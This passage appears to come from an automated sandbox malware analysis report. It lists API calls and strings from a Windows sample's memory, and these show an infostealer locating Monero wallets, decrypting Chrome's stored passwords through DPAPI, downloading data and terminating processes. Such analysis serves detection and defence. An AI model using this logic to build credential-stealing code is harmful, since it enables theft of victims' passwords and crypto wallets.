                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: a843c54ea1d7f8828be269ba09c009c1ca040c0af891fa4fb6488399e52bdeed
                          • Instruction ID: 2467619b91c1467abbe914fcde6f81d11891d21416c50a1209151e5a7351ff51
                          • Opcode Fuzzy Hash: a843c54ea1d7f8828be269ba09c009c1ca040c0af891fa4fb6488399e52bdeed
                          • Instruction Fuzzy Hash: 8F7141B1D0021DABDB54DF94CC80ADEB7B8FF49300F14456AE509E7340EB75AA85CB91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D1135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007D1159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007D1173
                          • RegCloseKey.ADVAPI32(?), ref: 007D117D
                          Strings
                          • wallet_path, xrefs: 007D116D
                          • SOFTWARE\monero-project\monero-core, xrefs: 007D114F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 75449132d8936d826157cdf79b7d8ae452b64e0d1be09274e8bed5ad2b3baffe
                          • Instruction ID: a0827bb13461027d46845d6e9a5625cd82d36df686e07720ac2f506af5540004
                          • Opcode Fuzzy Hash: 75449132d8936d826157cdf79b7d8ae452b64e0d1be09274e8bed5ad2b3baffe
                          • Instruction Fuzzy Hash: E5F06D75A4030DBBEB00DBE09C4DFAB7B7CEB04715F000054BE05E2281EAB45A4687A0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 007D9E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 007D9E42
                          • LocalAlloc.KERNEL32(00000040), ref: 007D9EA7
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • lstrcpy.KERNEL32(00000000,00804C48), ref: 007D9FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: d44c38507d24ec2e825b589298cf3c0c1bcc009fe267b33ee083729c6474c623
                          • Instruction ID: f63d33e00c2f291342f0b6248ace656ee33462937fbd85bdf96b3feadca42286
                          • Opcode Fuzzy Hash: d44c38507d24ec2e825b589298cf3c0c1bcc009fe267b33ee083729c6474c623
                          • Instruction Fuzzy Hash: C5519F72A10219ABDB10EFA4DC45B9E77B4EF90314F155426FE09EB342DB78ED068B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007D565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D5661
                          • InternetOpenA.WININET(007FCFEC,00000000,00000000,00000000,00000000), ref: 007D5677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 007D5692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 007D56BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 007D56E1
                          • InternetCloseHandle.WININET(?), ref: 007D56FA
                          • InternetCloseHandle.WININET(00000000), ref: 007D5701
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 0994c66a0ff6109e2832055d567224b3022b9f709ef427ea1cb681c048600f82
                          • Instruction ID: e4c60f27cbe164b897b1399472cf68bb436079d649f5e5d441fb44d6dd45290a
                          • Opcode Fuzzy Hash: 0994c66a0ff6109e2832055d567224b3022b9f709ef427ea1cb681c048600f82
                          • Instruction Fuzzy Hash: 6841B270A00209DFDB14CF94DD84FAAB7B4FF44710F24816AE5189B3A1D7759842CB94
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007F4759
                          • Process32First.KERNEL32(00000000,00000128), ref: 007F4769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F47AB
                          • CloseHandle.KERNEL32(00000000), ref: 007F47B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007F47C0
                          • CloseHandle.KERNEL32(00000000), ref: 007F47CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: fb5fb090db2d4e2ca953cb4f2459b1b4264a0a4a3cd30c7aeef73cab6a3eea13
                          • Instruction ID: b11955e04eda68461275cbccc274203ea188b39f222067358939a190ffa895d3
                          • Opcode Fuzzy Hash: fb5fb090db2d4e2ca953cb4f2459b1b4264a0a4a3cd30c7aeef73cab6a3eea13
                          • Instruction Fuzzy Hash: F301927160121DABE720AFB09C89FFB77BCEB08B51F004194FA4991181EF788D928A64
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007E8435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E846C
                          • lstrlen.KERNEL32(00000000), ref: 007E84B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E84E9
                          • lstrlen.KERNEL32(00000000), ref: 007E84FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E852E
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007E853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 75fea7980b354866dca27316fc31908d2eb6b01d688f0dbb14d9f0bf8faf01b9
                          • Instruction ID: 6ad15010758ed99c684f0b8ee75568561c79c22e507c830965e2939753d4e18a
                          • Opcode Fuzzy Hash: 75fea7980b354866dca27316fc31908d2eb6b01d688f0dbb14d9f0bf8faf01b9
                          • Instruction Fuzzy Hash: B951B4715012469FCB60DFA9D884A5BB7F9EF58300F148459EC89EB345EF38E942CB51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007F2925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F292C
                          • RegOpenKeyExA.ADVAPI32(80000002,0124C2E8,00000000,00020119,007F28A9), ref: 007F294B
                          • RegQueryValueExA.ADVAPI32(007F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007F2965
                          • RegCloseKey.ADVAPI32(007F28A9), ref: 007F296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 29ca02a3ef89dafbb6da94f836a7cd55a6c0e1dd98f39151e9f8964b03b7dae2
                          • Instruction ID: 4b7edc143b50e959f17f963ee9a79b513a4d302aba8545cd14d630f98cde962a
                          • Opcode Fuzzy Hash: 29ca02a3ef89dafbb6da94f836a7cd55a6c0e1dd98f39151e9f8964b03b7dae2
                          • Instruction Fuzzy Hash: 7501B17560031DABD710CBA09C59EFB7BBCEB49711F104058FE85E7281EA75590787A0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007F2895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F289C
                            • Part of subcall function 007F2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007F2925
                            • Part of subcall function 007F2910: RtlAllocateHeap.NTDLL(00000000), ref: 007F292C
                            • Part of subcall function 007F2910: RegOpenKeyExA.ADVAPI32(80000002,0124C2E8,00000000,00020119,007F28A9), ref: 007F294B
                            • Part of subcall function 007F2910: RegQueryValueExA.ADVAPI32(007F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007F2965
                            • Part of subcall function 007F2910: RegCloseKey.ADVAPI32(007F28A9), ref: 007F296F
                          • RegOpenKeyExA.ADVAPI32(80000002,0124C2E8,00000000,00020119,007E9500), ref: 007F28D1
                          • RegQueryValueExA.ADVAPI32(007E9500,0125E1F0,00000000,00000000,00000000,000000FF), ref: 007F28EC
                          • RegCloseKey.ADVAPI32(007E9500), ref: 007F28F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 5c4f0d7546a157b080d06f1e8011be960a7c317a0d50f4bd2681c307c8f303fc
                          • Instruction ID: 61902d5fd13abf217dc02ee8fda0dafb95a48352e64a244df4815d2404361dd8
                          • Opcode Fuzzy Hash: 5c4f0d7546a157b080d06f1e8011be960a7c317a0d50f4bd2681c307c8f303fc
                          • Instruction Fuzzy Hash: 6E018B71A0020DABEB10DBE4AC49EBB777DEB44311F004158FE48D6292EA7899478BA0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 007D723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 007D7279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D7280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007D72C3
                          • HeapFree.KERNEL32(00000000), ref: 007D72CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 007D7329
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 596ccacbea22fdc49128e00582ee76d60df4a7dd4e20746fa7dd77ce1564174d
                          • Instruction ID: 77434e852108ba250efd69ec7a76a237ee10f35e05d047100909ae9e5902209c
                          • Opcode Fuzzy Hash: 596ccacbea22fdc49128e00582ee76d60df4a7dd4e20746fa7dd77ce1564174d
                          • Instruction Fuzzy Hash: 5B417B717046469BDB24CFA9DC84BAAB3F8FB88305F14456AEC49CB300E639E901DB50
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007D9CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007D9CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007D9D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: c64ad769274d264d3cae3ff7bcccdcf593a6ffe92edb50f7c73835811a9ac4b9
                          • Instruction ID: c0b872ee39daaffbc594feed096681894ba6ae1fc6c7ef8e47d81769f525fd6d
                          • Opcode Fuzzy Hash: c64ad769274d264d3cae3ff7bcccdcf593a6ffe92edb50f7c73835811a9ac4b9
                          • Instruction Fuzzy Hash: 2741D271A102199BDB21EFB4DC496EEB7B5EF94304F048466EE15A7353EA38ED02C790
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EEA24
